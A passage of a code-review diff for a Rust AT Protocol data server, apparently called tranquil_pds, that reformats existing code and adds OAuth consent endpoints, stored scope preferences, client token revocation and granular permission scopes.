if dpop_secret.len() < 32 && std::env::var("TRANQUIL_PDS_ALLOW_INSECURE_SECRETS").is_err() {
54
panic!("DPOP_SECRET must be at least 32 characters");
55
}
56
···
97
}
98
});
99
100
-
if master_key.len() < 32 && std::env::var("TRANQUIL_PDS_ALLOW_INSECURE_SECRETS").is_err() {
101
panic!("MASTER_KEY must be at least 32 characters");
102
}
103
···
46
}
47
});
48
49
+
if jwt_secret.len() < 32
50
+
&& std::env::var("TRANQUIL_PDS_ALLOW_INSECURE_SECRETS").is_err()
51
+
{
52
panic!("JWT_SECRET must be at least 32 characters");
53
}
54
55
+
if dpop_secret.len() < 32
56
+
&& std::env::var("TRANQUIL_PDS_ALLOW_INSECURE_SECRETS").is_err()
57
+
{
58
panic!("DPOP_SECRET must be at least 32 characters");
59
}
60
···
101
}
102
});
103
104
+
if master_key.len() < 32
105
+
&& std::env::var("TRANQUIL_PDS_ALLOW_INSECURE_SECRETS").is_err()
106
+
{
107
panic!("MASTER_KEY must be at least 32 characters");
108
}
109
+5
-4
src/crawlers.rs
+5
-4
src/crawlers.rs
+1
-1
src/handle/mod.rs
+1
-1
src/handle/mod.rs
+17
-1
src/lib.rs
+17
-1
src/lib.rs
···
3
pub mod auth;
4
pub mod cache;
5
pub mod circuit_breaker;
6
pub mod config;
7
pub mod crawlers;
8
pub mod handle;
9
pub mod image;
10
pub mod metrics;
11
-
pub mod comms;
12
pub mod oauth;
13
pub mod plc;
14
pub mod rate_limit;
···
344
.route("/oauth/authorize", get(oauth::endpoints::authorize_get))
345
.route("/oauth/authorize", post(oauth::endpoints::authorize_post))
346
.route(
347
"/oauth/authorize/select",
348
post(oauth::endpoints::authorize_select),
349
)
···
359
"/oauth/authorize/deny",
360
post(oauth::endpoints::authorize_deny),
361
)
362
.route("/oauth/token", post(oauth::endpoints::token_endpoint))
363
.route("/oauth/revoke", post(oauth::endpoints::revoke_token))
364
.route(
···
368
.route(
369
"/xrpc/com.atproto.temp.checkSignupQueue",
370
get(api::temp::check_signup_queue),
371
)
372
.route(
373
"/xrpc/com.tranquil.account.getNotificationPrefs",
···
3
pub mod auth;
4
pub mod cache;
5
pub mod circuit_breaker;
6
+
pub mod comms;
7
pub mod config;
8
pub mod crawlers;
9
pub mod handle;
10
pub mod image;
11
pub mod metrics;
12
pub mod oauth;
13
pub mod plc;
14
pub mod rate_limit;
···
344
.route("/oauth/authorize", get(oauth::endpoints::authorize_get))
345
.route("/oauth/authorize", post(oauth::endpoints::authorize_post))
346
.route(
347
+
"/oauth/authorize/accounts",
348
+
get(oauth::endpoints::authorize_accounts),
349
+
)
350
+
.route(
351
"/oauth/authorize/select",
352
post(oauth::endpoints::authorize_select),
353
)
···
363
"/oauth/authorize/deny",
364
post(oauth::endpoints::authorize_deny),
365
)
366
+
.route(
367
+
"/oauth/authorize/consent",
368
+
get(oauth::endpoints::consent_get),
369
+
)
370
+
.route(
371
+
"/oauth/authorize/consent",
372
+
post(oauth::endpoints::consent_post),
373
+
)
374
.route("/oauth/token", post(oauth::endpoints::token_endpoint))
375
.route("/oauth/revoke", post(oauth::endpoints::revoke_token))
376
.route(
···
380
.route(
381
"/xrpc/com.atproto.temp.checkSignupQueue",
382
get(api::temp::check_signup_queue),
383
+
)
384
+
.route(
385
+
"/xrpc/com.atproto.temp.dereferenceScope",
386
+
post(api::temp::dereference_scope),
387
)
388
.route(
389
"/xrpc/com.tranquil.account.getNotificationPrefs",
+3
-3
src/main.rs
+3
-3
src/main.rs
···
1
-
use tranquil_pds::comms::{CommsService, DiscordSender, EmailSender, SignalSender, TelegramSender};
2
-
use tranquil_pds::crawlers::{Crawlers, start_crawlers_service};
3
-
use tranquil_pds::state::AppState;
4
use std::net::SocketAddr;
5
use std::process::ExitCode;
6
use std::sync::Arc;
7
use tokio::sync::watch;
8
use tracing::{error, info, warn};
9
10
#[tokio::main]
11
async fn main() -> ExitCode {
···
1
use std::net::SocketAddr;
2
use std::process::ExitCode;
3
use std::sync::Arc;
4
use tokio::sync::watch;
5
use tracing::{error, info, warn};
6
+
use tranquil_pds::comms::{CommsService, DiscordSender, EmailSender, SignalSender, TelegramSender};
7
+
use tranquil_pds::crawlers::{Crawlers, start_crawlers_service};
8
+
use tranquil_pds::state::AppState;
9
10
#[tokio::main]
11
async fn main() -> ExitCode {
+20
-10
src/metrics.rs
+20
-10
src/metrics.rs
···
24
}
25
26
fn describe_metrics() {
27
-
metrics::describe_counter!("tranquil_pds_http_requests_total", "Total number of HTTP requests");
28
metrics::describe_histogram!(
29
"tranquil_pds_http_request_duration_seconds",
30
"HTTP request duration in seconds"
···
61
"tranquil_pds_rate_limit_rejections_total",
62
"Total number of rate limit rejections"
63
);
64
-
metrics::describe_counter!("tranquil_pds_db_queries_total", "Total number of database queries");
65
metrics::describe_histogram!(
66
"tranquil_pds_db_query_duration_seconds",
67
"Database query duration in seconds"
···
116
117
fn normalize_path(path: &str) -> String {
118
if path.starts_with("/xrpc/")
119
-
&& let Some(method) = path.strip_prefix("/xrpc/") {
120
-
if let Some(q) = method.find('?') {
121
-
return format!("/xrpc/{}", &method[..q]);
122
-
}
123
-
return path.to_string();
124
}
125
126
if path.starts_with("/u/") && path.ends_with("/did.json") {
127
return "/u/{handle}/did.json".to_string();
···
135
}
136
137
pub fn record_auth_cache_hit(cache_type: &str) {
138
-
counter!("tranquil_pds_auth_cache_hits_total", "cache_type" => cache_type.to_string()).increment(1);
139
}
140
141
pub fn record_auth_cache_miss(cache_type: &str) {
142
-
counter!("tranquil_pds_auth_cache_misses_total", "cache_type" => cache_type.to_string()).increment(1);
143
}
144
145
pub fn set_firehose_subscribers(count: usize) {
···
172
}
173
174
pub fn record_rate_limit_rejection(limiter: &str) {
175
-
counter!("tranquil_pds_rate_limit_rejections_total", "limiter" => limiter.to_string()).increment(1);
176
}
177
178
pub fn record_db_query(query_type: &str, duration_seconds: f64) {
···
24
}
25
26
fn describe_metrics() {
27
+
metrics::describe_counter!(
28
+
"tranquil_pds_http_requests_total",
29
+
"Total number of HTTP requests"
30
+
);
31
metrics::describe_histogram!(
32
"tranquil_pds_http_request_duration_seconds",
33
"HTTP request duration in seconds"
···
64
"tranquil_pds_rate_limit_rejections_total",
65
"Total number of rate limit rejections"
66
);
67
+
metrics::describe_counter!(
68
+
"tranquil_pds_db_queries_total",
69
+
"Total number of database queries"
70
+
);
71
metrics::describe_histogram!(
72
"tranquil_pds_db_query_duration_seconds",
73
"Database query duration in seconds"
···
122
123
fn normalize_path(path: &str) -> String {
124
if path.starts_with("/xrpc/")
125
+
&& let Some(method) = path.strip_prefix("/xrpc/")
126
+
{
127
+
if let Some(q) = method.find('?') {
128
+
return format!("/xrpc/{}", &method[..q]);
129
}
130
+
return path.to_string();
131
+
}
132
133
if path.starts_with("/u/") && path.ends_with("/did.json") {
134
return "/u/{handle}/did.json".to_string();
···
142
}
143
144
pub fn record_auth_cache_hit(cache_type: &str) {
145
+
counter!("tranquil_pds_auth_cache_hits_total", "cache_type" => cache_type.to_string())
146
+
.increment(1);
147
}
148
149
pub fn record_auth_cache_miss(cache_type: &str) {
150
+
counter!("tranquil_pds_auth_cache_misses_total", "cache_type" => cache_type.to_string())
151
+
.increment(1);
152
}
153
154
pub fn set_firehose_subscribers(count: usize) {
···
181
}
182
183
pub fn record_rate_limit_rejection(limiter: &str) {
184
+
counter!("tranquil_pds_rate_limit_rejections_total", "limiter" => limiter.to_string())
185
+
.increment(1);
186
}
187
188
pub fn record_db_query(query_type: &str, duration_seconds: f64) {
+36
-32
src/oauth/client.rs
+36
-32
src/oauth/client.rs
···
135
{
136
let cache = self.cache.read().await;
137
if let Some(cached) = cache.get(client_id)
138
-
&& cached.cached_at.elapsed().as_secs() < self.cache_ttl_secs {
139
-
return Ok(cached.metadata.clone());
140
-
}
141
}
142
let metadata = self.fetch_metadata(client_id).await?;
143
{
···
168
{
169
let cache = self.jwks_cache.read().await;
170
if let Some(cached) = cache.get(jwks_uri)
171
-
&& cached.cached_at.elapsed().as_secs() < self.cache_ttl_secs {
172
-
return Ok(cached.jwks.clone());
173
-
}
174
}
175
let jwks = self.fetch_jwks(jwks_uri).await?;
176
{
···
190
if !jwks_uri.starts_with("https://")
191
&& (!jwks_uri.starts_with("http://")
192
|| (!jwks_uri.contains("localhost") && !jwks_uri.contains("127.0.0.1")))
193
-
{
194
-
return Err(OAuthError::InvalidClient(
195
-
"jwks_uri must use https (except for localhost)".to_string(),
196
-
));
197
-
}
198
let response = self
199
.http_client
200
.get(jwks_uri)
···
302
return Ok(());
303
}
304
if Self::is_loopback_client(&metadata.client_id)
305
-
&& let Ok(req_url) = reqwest::Url::parse(redirect_uri) {
306
-
let req_host = req_url.host_str().unwrap_or("");
307
-
let is_loopback_redirect = req_url.scheme() == "http"
308
-
&& (req_host == "localhost" || req_host == "127.0.0.1" || req_host == "[::1]");
309
-
if is_loopback_redirect {
310
-
for registered in &metadata.redirect_uris {
311
-
if let Ok(reg_url) = reqwest::Url::parse(registered) {
312
-
let reg_host = reg_url.host_str().unwrap_or("");
313
-
let hosts_match = (req_host == "localhost" && reg_host == "localhost")
314
-
|| (req_host == "127.0.0.1" && reg_host == "127.0.0.1")
315
-
|| (req_host == "[::1]" && reg_host == "[::1]")
316
-
|| (req_host == "localhost" && reg_host == "127.0.0.1")
317
-
|| (req_host == "127.0.0.1" && reg_host == "localhost");
318
-
if hosts_match && req_url.path() == reg_url.path() {
319
-
return Ok(());
320
-
}
321
}
322
}
323
}
324
}
325
Err(OAuthError::InvalidRequest(
326
"redirect_uri not registered for client".to_string(),
327
))
···
501
));
502
}
503
if let Some(iat) = iat
504
-
&& iat > now + 60 {
505
-
return Err(OAuthError::InvalidClient(
506
-
"client_assertion iat is in the future".to_string(),
507
-
));
508
-
}
509
let jwks = cache.get_jwks(metadata).await?;
510
let keys = jwks
511
.get("keys")
···
135
{
136
let cache = self.cache.read().await;
137
if let Some(cached) = cache.get(client_id)
138
+
&& cached.cached_at.elapsed().as_secs() < self.cache_ttl_secs
139
+
{
140
+
return Ok(cached.metadata.clone());
141
+
}
142
}
143
let metadata = self.fetch_metadata(client_id).await?;
144
{
···
169
{
170
let cache = self.jwks_cache.read().await;
171
if let Some(cached) = cache.get(jwks_uri)
172
+
&& cached.cached_at.elapsed().as_secs() < self.cache_ttl_secs
173
+
{
174
+
return Ok(cached.jwks.clone());
175
+
}
176
}
177
let jwks = self.fetch_jwks(jwks_uri).await?;
178
{
···
192
if !jwks_uri.starts_with("https://")
193
&& (!jwks_uri.starts_with("http://")
194
|| (!jwks_uri.contains("localhost") && !jwks_uri.contains("127.0.0.1")))
195
+
{
196
+
return Err(OAuthError::InvalidClient(
197
+
"jwks_uri must use https (except for localhost)".to_string(),
198
+
));
199
+
}
200
let response = self
201
.http_client
202
.get(jwks_uri)
···
304
return Ok(());
305
}
306
if Self::is_loopback_client(&metadata.client_id)
307
+
&& let Ok(req_url) = reqwest::Url::parse(redirect_uri)
308
+
{
309
+
let req_host = req_url.host_str().unwrap_or("");
310
+
let is_loopback_redirect = req_url.scheme() == "http"
311
+
&& (req_host == "localhost" || req_host == "127.0.0.1" || req_host == "[::1]");
312
+
if is_loopback_redirect {
313
+
for registered in &metadata.redirect_uris {
314
+
if let Ok(reg_url) = reqwest::Url::parse(registered) {
315
+
let reg_host = reg_url.host_str().unwrap_or("");
316
+
let hosts_match = (req_host == "localhost" && reg_host == "localhost")
317
+
|| (req_host == "127.0.0.1" && reg_host == "127.0.0.1")
318
+
|| (req_host == "[::1]" && reg_host == "[::1]")
319
+
|| (req_host == "localhost" && reg_host == "127.0.0.1")
320
+
|| (req_host == "127.0.0.1" && reg_host == "localhost");
321
+
if hosts_match && req_url.path() == reg_url.path() {
322
+
return Ok(());
323
}
324
}
325
}
326
}
327
+
}
328
Err(OAuthError::InvalidRequest(
329
"redirect_uri not registered for client".to_string(),
330
))
···
504
));
505
}
506
if let Some(iat) = iat
507
+
&& iat > now + 60
508
+
{
509
+
return Err(OAuthError::InvalidClient(
510
+
"client_assertion iat is in the future".to_string(),
511
+
));
512
+
}
513
let jwks = cache.get_jwks(metadata).await?;
514
let keys = jwks
515
.get("keys")
+8
-2
src/oauth/db/mod.rs
+8
-2
src/oauth/db/mod.rs
···
3
mod dpop;
4
mod helpers;
5
mod request;
6
mod token;
7
mod two_factor;
8
···
15
pub use request::{
16
consume_authorization_request_by_code, create_authorization_request,
17
delete_authorization_request, delete_expired_authorization_requests, get_authorization_request,
18
-
update_authorization_request,
19
};
20
pub use token::{
21
check_refresh_token_used, count_tokens_for_user, create_token, delete_oldest_tokens_for_user,
22
delete_token, delete_token_family, enforce_token_limit_for_user, get_token_by_id,
23
-
get_token_by_refresh_token, list_tokens_for_user, rotate_token,
24
};
25
pub use two_factor::{
26
TwoFactorChallenge, check_user_2fa_enabled, cleanup_expired_2fa_challenges,
···
3
mod dpop;
4
mod helpers;
5
mod request;
6
+
mod scope_preference;
7
mod token;
8
mod two_factor;
9
···
16
pub use request::{
17
consume_authorization_request_by_code, create_authorization_request,
18
delete_authorization_request, delete_expired_authorization_requests, get_authorization_request,
19
+
mark_request_authenticated, set_authorization_did, update_authorization_request,
20
+
update_request_scope,
21
+
};
22
+
pub use scope_preference::{
23
+
ScopePreference, delete_scope_preferences, get_scope_preferences, should_show_consent,
24
+
upsert_scope_preferences,
25
};
26
pub use token::{
27
check_refresh_token_used, count_tokens_for_user, create_token, delete_oldest_tokens_for_user,
28
delete_token, delete_token_family, enforce_token_limit_for_user, get_token_by_id,
29
+
get_token_by_refresh_token, list_tokens_for_user, revoke_tokens_for_client, rotate_token,
30
};
31
pub use two_factor::{
32
TwoFactorChallenge, check_user_2fa_enabled, cleanup_expired_2fa_challenges,
+61
src/oauth/db/request.rs
+61
src/oauth/db/request.rs
···
67
}
68
}
69
70
+
pub async fn set_authorization_did(
71
+
pool: &PgPool,
72
+
request_id: &str,
73
+
did: &str,
74
+
device_id: Option<&str>,
75
+
) -> Result<(), OAuthError> {
76
+
sqlx::query!(
77
+
r#"
78
+
UPDATE oauth_authorization_request
79
+
SET did = $2, device_id = $3
80
+
WHERE id = $1
81
+
"#,
82
+
request_id,
83
+
did,
84
+
device_id
85
+
)
86
+
.execute(pool)
87
+
.await?;
88
+
Ok(())
89
+
}
90
+
91
pub async fn update_authorization_request(
92
pool: &PgPool,
93
request_id: &str,
···
172
.await?;
173
Ok(result.rows_affected())
174
}
175
+
176
+
pub async fn mark_request_authenticated(
177
+
pool: &PgPool,
178
+
request_id: &str,
179
+
did: &str,
180
+
device_id: Option<&str>,
181
+
) -> Result<(), OAuthError> {
182
+
sqlx::query!(
183
+
r#"
184
+
UPDATE oauth_authorization_request
185
+
SET did = $2, device_id = $3
186
+
WHERE id = $1
187
+
"#,
188
+
request_id,
189
+
did,
190
+
device_id
191
+
)
192
+
.execute(pool)
193
+
.await?;
194
+
Ok(())
195
+
}
196
+
197
+
pub async fn update_request_scope(
198
+
pool: &PgPool,
199
+
request_id: &str,
200
+
scope: &str,
201
+
) -> Result<(), OAuthError> {
202
+
sqlx::query!(
203
+
r#"
204
+
UPDATE oauth_authorization_request
205
+
SET parameters = jsonb_set(parameters, '{scope}', to_jsonb($2::text))
206
+
WHERE id = $1
207
+
"#,
208
+
request_id,
209
+
scope
210
+
)
211
+
.execute(pool)
212
+
.await?;
213
+
Ok(())
214
+
}
+103
src/oauth/db/scope_preference.rs
+103
src/oauth/db/scope_preference.rs
···
···
1
+
use super::super::OAuthError;
2
+
use serde::{Deserialize, Serialize};
3
+
use sqlx::PgPool;
4
+
5
+
#[derive(Debug, Clone, Serialize, Deserialize)]
6
+
pub struct ScopePreference {
7
+
pub scope: String,
8
+
pub granted: bool,
9
+
}
10
+
11
+
pub async fn get_scope_preferences(
12
+
pool: &PgPool,
13
+
did: &str,
14
+
client_id: &str,
15
+
) -> Result<Vec<ScopePreference>, OAuthError> {
16
+
let rows = sqlx::query!(
17
+
r#"
18
+
SELECT scope, granted FROM oauth_scope_preference
19
+
WHERE did = $1 AND client_id = $2
20
+
"#,
21
+
did,
22
+
client_id
23
+
)
24
+
.fetch_all(pool)
25
+
.await?;
26
+
27
+
Ok(rows
28
+
.into_iter()
29
+
.map(|r| ScopePreference {
30
+
scope: r.scope,
31
+
granted: r.granted,
32
+
})
33
+
.collect())
34
+
}
35
+
36
+
pub async fn upsert_scope_preferences(
37
+
pool: &PgPool,
38
+
did: &str,
39
+
client_id: &str,
40
+
prefs: &[ScopePreference],
41
+
) -> Result<(), OAuthError> {
42
+
for pref in prefs {
43
+
sqlx::query!(
44
+
r#"
45
+
INSERT INTO oauth_scope_preference (did, client_id, scope, granted, created_at, updated_at)
46
+
VALUES ($1, $2, $3, $4, NOW(), NOW())
47
+
ON CONFLICT (did, client_id, scope) DO UPDATE SET granted = $4, updated_at = NOW()
48
+
"#,
49
+
did,
50
+
client_id,
51
+
pref.scope,
52
+
pref.granted
53
+
)
54
+
.execute(pool)
55
+
.await?;
56
+
}
57
+
Ok(())
58
+
}
59
+
60
+
pub async fn should_show_consent(
61
+
pool: &PgPool,
62
+
did: &str,
63
+
client_id: &str,
64
+
requested_scopes: &[String],
65
+
) -> Result<bool, OAuthError> {
66
+
if requested_scopes.is_empty() {
67
+
return Ok(false);
68
+
}
69
+
70
+
let stored_prefs = get_scope_preferences(pool, did, client_id).await?;
71
+
if stored_prefs.is_empty() {
72
+
return Ok(true);
73
+
}
74
+
75
+
let stored_scopes: std::collections::HashSet<&str> =
76
+
stored_prefs.iter().map(|p| p.scope.as_str()).collect();
77
+
78
+
for scope in requested_scopes {
79
+
if !stored_scopes.contains(scope.as_str()) {
80
+
return Ok(true);
81
+
}
82
+
}
83
+
84
+
Ok(false)
85
+
}
86
+
87
+
pub async fn delete_scope_preferences(
88
+
pool: &PgPool,
89
+
did: &str,
90
+
client_id: &str,
91
+
) -> Result<(), OAuthError> {
92
+
sqlx::query!(
93
+
r#"
94
+
DELETE FROM oauth_scope_preference
95
+
WHERE did = $1 AND client_id = $2
96
+
"#,
97
+
did,
98
+
client_id
99
+
)
100
+
.execute(pool)
101
+
.await?;
102
+
Ok(())
103
+
}
+15
src/oauth/db/token.rs
+15
src/oauth/db/token.rs
···
268
}
269
Ok(())
270
}
271
+
272
+
pub async fn revoke_tokens_for_client(
273
+
pool: &PgPool,
274
+
did: &str,
275
+
client_id: &str,
276
+
) -> Result<u64, OAuthError> {
277
+
let result = sqlx::query!(
278
+
"DELETE FROM oauth_token WHERE did = $1 AND client_id = $2",
279
+
did,
280
+
client_id
281
+
)
282
+
.execute(pool)
283
+
.await?;
284
+
Ok(result.rows_affected())
285
+
}
+11
src/oauth/endpoints/metadata.rs
+11
src/oauth/endpoints/metadata.rs
···
79
"atproto".to_string(),
80
"transition:generic".to_string(),
81
"transition:chat.bsky".to_string(),
82
+
"repo:*".to_string(),
83
+
"repo:*?action=create".to_string(),
84
+
"repo:*?action=read".to_string(),
85
+
"repo:*?action=update".to_string(),
86
+
"repo:*?action=delete".to_string(),
87
+
"blob:*/*".to_string(),
88
+
"rpc:*".to_string(),
89
+
"account:*".to_string(),
90
+
"account:*?action=read".to_string(),
91
+
"account:*?action=write".to_string(),
92
+
"identity:*".to_string(),
93
]),
94
response_types_supported: vec!["code".to_string()],
95
response_modes_supported: Some(vec!["query".to_string(), "fragment".to_string()]),
+91
-11
src/oauth/endpoints/par.rs
+91
-11
src/oauth/endpoints/par.rs
···
1
use crate::oauth::{
2
AuthorizationRequestParameters, ClientAuth, OAuthError, RequestData, RequestId,
3
-
client::ClientMetadataCache, db,
4
};
5
use crate::state::{AppState, RateLimitKind};
6
-
use axum::{Form, Json, extract::State, http::HeaderMap};
7
use chrono::{Duration, Utc};
8
use serde::{Deserialize, Serialize};
9
10
const PAR_EXPIRY_SECONDS: i64 = 600;
11
-
const SUPPORTED_SCOPES: &[&str] = &["atproto", "transition:generic", "transition:chat.bsky"];
12
13
#[derive(Debug, Deserialize)]
14
pub struct ParRequest {
···
23
pub code_challenge: Option<String>,
24
#[serde(default)]
25
pub code_challenge_method: Option<String>,
26
#[serde(default)]
27
pub login_hint: Option<String>,
28
#[serde(default)]
···
44
pub async fn pushed_authorization_request(
45
State(state): State<AppState>,
46
headers: HeaderMap,
47
-
Form(request): Form<ParRequest>,
48
) -> Result<(axum::http::StatusCode, Json<ParResponse>), OAuthError> {
49
let client_ip = crate::rate_limit::extract_client_ip(&headers, None);
50
if !state
51
.check_rate_limit(RateLimitKind::OAuthPar, &client_ip)
···
77
let validated_scope = validate_scope(&request.scope, &client_metadata)?;
78
let request_id = RequestId::generate();
79
let expires_at = Utc::now() + Duration::seconds(PAR_EXPIRY_SECONDS);
80
let parameters = AuthorizationRequestParameters {
81
response_type: request.response_type,
82
client_id: request.client_id.clone(),
···
85
state: request.state,
86
code_challenge: code_challenge.clone(),
87
code_challenge_method: code_challenge_method.to_string(),
88
login_hint: request.login_hint,
89
dpop_jkt: request.dpop_jkt,
90
extra: None,
···
149
if requested_scopes.is_empty() {
150
return Ok(Some("atproto".to_string()));
151
}
152
for scope in &requested_scopes {
153
-
if !SUPPORTED_SCOPES.contains(scope) {
154
-
return Err(OAuthError::InvalidScope(format!(
155
-
"Unsupported scope: {}. Supported scopes: {}",
156
-
scope,
157
-
SUPPORTED_SCOPES.join(", ")
158
-
)));
159
}
160
}
161
if let Some(client_scope) = &client_metadata.scope {
162
let client_scopes: Vec<&str> = client_scope.split_whitespace().collect();
163
for scope in &requested_scopes {
164
-
if !client_scopes.contains(scope) {
165
return Err(OAuthError::InvalidScope(format!(
166
"Scope '{}' not registered for this client",
167
scope
···
171
}
172
Ok(Some(requested_scopes.join(" ")))
173
}
···
1
use crate::oauth::{
2
AuthorizationRequestParameters, ClientAuth, OAuthError, RequestData, RequestId,
3
+
client::ClientMetadataCache,
4
+
db,
5
+
scopes::{ParsedScope, parse_scope},
6
};
7
use crate::state::{AppState, RateLimitKind};
8
+
use axum::body::Bytes;
9
+
use axum::{Json, extract::State, http::HeaderMap};
10
use chrono::{Duration, Utc};
11
use serde::{Deserialize, Serialize};
12
13
const PAR_EXPIRY_SECONDS: i64 = 600;
14
15
#[derive(Debug, Deserialize)]
16
pub struct ParRequest {
···
25
pub code_challenge: Option<String>,
26
#[serde(default)]
27
pub code_challenge_method: Option<String>,
28
+
#[serde(default)]
29
+
pub response_mode: Option<String>,
30
#[serde(default)]
31
pub login_hint: Option<String>,
32
#[serde(default)]
···
48
pub async fn pushed_authorization_request(
49
State(state): State<AppState>,
50
headers: HeaderMap,
51
+
body: Bytes,
52
) -> Result<(axum::http::StatusCode, Json<ParResponse>), OAuthError> {
53
+
let content_type = headers
54
+
.get("content-type")
55
+
.and_then(|v| v.to_str().ok())
56
+
.unwrap_or("");
57
+
let request: ParRequest = if content_type.starts_with("application/json") {
58
+
serde_json::from_slice(&body)
59
+
.map_err(|e| OAuthError::InvalidRequest(format!("Invalid JSON: {}", e)))?
60
+
} else if content_type.starts_with("application/x-www-form-urlencoded") {
61
+
serde_urlencoded::from_bytes(&body)
62
+
.map_err(|e| OAuthError::InvalidRequest(format!("Invalid form data: {}", e)))?
63
+
} else {
64
+
return Err(OAuthError::InvalidRequest(
65
+
"Content-Type must be application/json or application/x-www-form-urlencoded"
66
+
.to_string(),
67
+
));
68
+
};
69
let client_ip = crate::rate_limit::extract_client_ip(&headers, None);
70
if !state
71
.check_rate_limit(RateLimitKind::OAuthPar, &client_ip)
···
97
let validated_scope = validate_scope(&request.scope, &client_metadata)?;
98
let request_id = RequestId::generate();
99
let expires_at = Utc::now() + Duration::seconds(PAR_EXPIRY_SECONDS);
100
+
let response_mode = match request.response_mode.as_deref() {
101
+
Some("fragment") => Some("fragment".to_string()),
102
+
Some("query") | None => None,
103
+
Some(mode) => {
104
+
return Err(OAuthError::InvalidRequest(format!(
105
+
"Unsupported response_mode: {}",
106
+
mode
107
+
)));
108
+
}
109
+
};
110
let parameters = AuthorizationRequestParameters {
111
response_type: request.response_type,
112
client_id: request.client_id.clone(),
···
115
state: request.state,
116
code_challenge: code_challenge.clone(),
117
code_challenge_method: code_challenge_method.to_string(),
118
+
response_mode,
119
login_hint: request.login_hint,
120
dpop_jkt: request.dpop_jkt,
121
extra: None,
···
180
if requested_scopes.is_empty() {
181
return Ok(Some("atproto".to_string()));
182
}
183
+
let mut has_transition = false;
184
+
let mut has_granular = false;
185
+
186
for scope in &requested_scopes {
187
+
let parsed = parse_scope(scope);
188
+
match &parsed {
189
+
ParsedScope::Unknown(_) => {
190
+
return Err(OAuthError::InvalidScope(format!(
191
+
"Unsupported scope: {}",
192
+
scope
193
+
)));
194
+
}
195
+
ParsedScope::TransitionGeneric
196
+
| ParsedScope::TransitionChat
197
+
| ParsedScope::TransitionEmail => {
198
+
has_transition = true;
199
+
}
200
+
ParsedScope::Repo(_)
201
+
| ParsedScope::Blob(_)
202
+
| ParsedScope::Rpc(_)
203
+
| ParsedScope::Account(_)
204
+
| ParsedScope::Identity(_)
205
+
| ParsedScope::Include(_) => {
206
+
has_granular = true;
207
+
}
208
+
ParsedScope::Atproto => {}
209
}
210
}
211
+
212
+
if has_transition && has_granular {
213
+
return Err(OAuthError::InvalidScope(
214
+
"Cannot mix transition scopes with granular scopes. Use either transition:* scopes OR granular scopes (repo:*, blob:*, rpc:*, account:*, include:*), not both.".to_string()
215
+
));
216
+
}
217
+
218
if let Some(client_scope) = &client_metadata.scope {
219
let client_scopes: Vec<&str> = client_scope.split_whitespace().collect();
220
for scope in &requested_scopes {
221
+
if !client_scopes.iter().any(|cs| scope_matches(cs, scope)) {
222
return Err(OAuthError::InvalidScope(format!(
223
"Scope '{}' not registered for this client",
224
scope
···
228
}
229
Ok(Some(requested_scopes.join(" ")))
230
}
231
+
232
+
fn scope_matches(client_scope: &str, requested_scope: &str) -> bool {
233
+
if client_scope == requested_scope {
234
+
return true;
235
+
}
236
+
237
+
fn get_resource_type(scope: &str) -> &str {
238
+
let base = scope.split('?').next().unwrap_or(scope);
239
+
base.split(':').next().unwrap_or(base)
240
+
}
241
+
242
+
let client_type = get_resource_type(client_scope);
243
+
let requested_type = get_resource_type(requested_scope);
244
+
245
+
if client_type == requested_type {
246
+
let client_base = client_scope.split('?').next().unwrap_or(client_scope);
247
+
if client_base.contains('*') {
248
+
return true;
249
+
}
250
+
}
251
+
252
+
false
253
+
}
+37
-20
src/oauth/endpoints/token/grants.rs
+37
-20
src/oauth/endpoints/token/grants.rs
···
36
));
37
}
38
if let Some(request_client_id) = &request.client_id
39
-
&& request_client_id != &auth_request.client_id {
40
-
return Err(OAuthError::InvalidGrant("client_id mismatch".to_string()));
41
-
}
42
let did = auth_request
43
.did
44
.ok_or_else(|| OAuthError::InvalidGrant("Authorization not completed".to_string()))?;
···
65
verify_client_auth(&client_metadata_cache, &client_metadata, &client_auth).await?;
66
verify_pkce(&auth_request.parameters.code_challenge, &code_verifier)?;
67
if let Some(redirect_uri) = &request.redirect_uri
68
-
&& redirect_uri != &auth_request.parameters.redirect_uri {
69
-
return Err(OAuthError::InvalidGrant(
70
-
"redirect_uri mismatch".to_string(),
71
-
));
72
-
}
73
let dpop_jkt = if let Some(proof) = &dpop_proof {
74
let config = AuthConfig::get();
75
let verifier = DPoPVerifier::new(config.dpop_secret().as_bytes());
···
83
));
84
}
85
if let Some(expected_jkt) = &auth_request.parameters.dpop_jkt
86
-
&& &result.jkt != expected_jkt {
87
-
return Err(OAuthError::InvalidDpopProof(
88
-
"DPoP key binding mismatch".to_string(),
89
-
));
90
-
}
91
Some(result.jkt)
92
} else if auth_request.parameters.dpop_jkt.is_some() {
93
return Err(OAuthError::InvalidRequest(
···
96
} else {
97
None
98
};
99
let token_id = TokenId::generate();
100
let refresh_token = RefreshToken::generate();
101
let now = Utc::now();
102
-
let access_token = create_access_token(&token_id.0, &did, dpop_jkt.as_deref())?;
103
let token_data = TokenData {
104
did: did.clone(),
105
token_id: token_id.0.clone(),
···
179
));
180
}
181
if let Some(expected_jkt) = &token_data.parameters.dpop_jkt
182
-
&& &result.jkt != expected_jkt {
183
-
return Err(OAuthError::InvalidDpopProof(
184
-
"DPoP key binding mismatch".to_string(),
185
-
));
186
-
}
187
Some(result.jkt)
188
} else if token_data.parameters.dpop_jkt.is_some() {
189
return Err(OAuthError::InvalidRequest(
···
203
new_expires_at,
204
)
205
.await?;
206
-
let access_token = create_access_token(&new_token_id.0, &token_data.did, dpop_jkt.as_deref())?;
207
let mut response_headers = HeaderMap::new();
208
let config = AuthConfig::get();
209
let verifier = DPoPVerifier::new(config.dpop_secret().as_bytes());
···
36
));
37
}
38
if let Some(request_client_id) = &request.client_id
39
+
&& request_client_id != &auth_request.client_id
40
+
{
41
+
return Err(OAuthError::InvalidGrant("client_id mismatch".to_string()));
42
+
}
43
let did = auth_request
44
.did
45
.ok_or_else(|| OAuthError::InvalidGrant("Authorization not completed".to_string()))?;
···
66
verify_client_auth(&client_metadata_cache, &client_metadata, &client_auth).await?;
67
verify_pkce(&auth_request.parameters.code_challenge, &code_verifier)?;
68
if let Some(redirect_uri) = &request.redirect_uri
69
+
&& redirect_uri != &auth_request.parameters.redirect_uri
70
+
{
71
+
return Err(OAuthError::InvalidGrant(
72
+
"redirect_uri mismatch".to_string(),
73
+
));
74
+
}
75
let dpop_jkt = if let Some(proof) = &dpop_proof {
76
let config = AuthConfig::get();
77
let verifier = DPoPVerifier::new(config.dpop_secret().as_bytes());
···
85
));
86
}
87
if let Some(expected_jkt) = &auth_request.parameters.dpop_jkt
88
+
&& &result.jkt != expected_jkt
89
+
{
90
+
return Err(OAuthError::InvalidDpopProof(
91
+
"DPoP key binding mismatch".to_string(),
92
+
));
93
+
}
94
Some(result.jkt)
95
